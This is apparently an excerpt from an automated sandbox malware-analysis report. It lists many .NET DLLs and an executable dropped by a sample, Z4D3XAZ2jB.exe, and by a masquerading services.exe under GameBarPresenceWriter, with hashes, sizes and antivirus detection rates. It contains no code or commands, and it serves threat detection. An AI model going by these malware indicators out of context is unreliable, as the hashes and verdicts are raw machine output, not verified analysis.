                                                                                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):70144
                                                                                                                              Entropy (8bit):5.909536568846014
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):342528
                                                                                                                              Entropy (8bit):6.170134230759619
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.660491370279985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                              MD5:240E98D38E0B679F055470167D247022
                                                                                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28160
                                                                                                                              Entropy (8bit):5.570953308352568
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):34816
                                                                                                                              Entropy (8bit):5.636032516496583
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33792
                                                                                                                              Entropy (8bit):5.541771649974822
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28160
                                                                                                                              Entropy (8bit):5.570953308352568
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32256
                                                                                                                              Entropy (8bit):5.631194486392901
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):41472
                                                                                                                              Entropy (8bit):5.6808219961645605
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.629584586954759
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32768
                                                                                                                              Entropy (8bit):5.645950918301459
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.629584586954759
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32768
                                                                                                                              Entropy (8bit):5.645950918301459
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):70144
                                                                                                                              Entropy (8bit):5.909536568846014
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):36352
                                                                                                                              Entropy (8bit):5.668291349855899
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40448
                                                                                                                              Entropy (8bit):5.7028690200758465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33280
                                                                                                                              Entropy (8bit):5.634433516692816
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):38912
                                                                                                                              Entropy (8bit):5.679286635687991
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):69632
                                                                                                                              Entropy (8bit):5.932541123129161
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):33280
                                                                                                                              Entropy (8bit):5.634433516692816
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40448
                                                                                                                              Entropy (8bit):5.7028690200758465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):126976
                                                                                                                              Entropy (8bit):6.057993947082715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):39936
                                                                                                                              Entropy (8bit):5.660491370279985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                              MD5:240E98D38E0B679F055470167D247022
                                                                                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):34816
                                                                                                                              Entropy (8bit):5.636032516496583
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3163910
                                                                                                                              Entropy (8bit):7.992391848855575
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ILfoFX5SJqMr60Ag4ErCKLYy3XxggNblydYuwVHlizQ/U4oiUT6JgcBKMzWpwneR:8AkqMrv4ErCKbfl/uwVHlNlzQUWWeWC
                                                                                                                              MD5:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              SHA1:9571472C5D0899E517E1C1F84C6C05DFD2ABB2B5
                                                                                                                              SHA-256:9C2AD3D80258AF2508987D952DD5A7744BEDBDD16260E4F76412EA6696774285
                                                                                                                              SHA-512:439D108D086E6231513A7D40E01EA9C8D1B0D9948C9412F2828F694D94CCFA64E98D8A6956464CCCB632BB072AAE4E3C00154733BC3AF97A11CD7A57F0B0FB10
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with very long lines (472), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):472
                                                                                                                              Entropy (8bit):5.85928305820468
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:cZyrLxd9exp3iTKponyksBwQmqQeBEno0SUEGVgRsCN+22vmvQ:cZyrLxd9SyFGwdsEnkGYsSI
                                                                                                                              MD5:BC697A7BA014AD919BDDD7AF509B7DDB
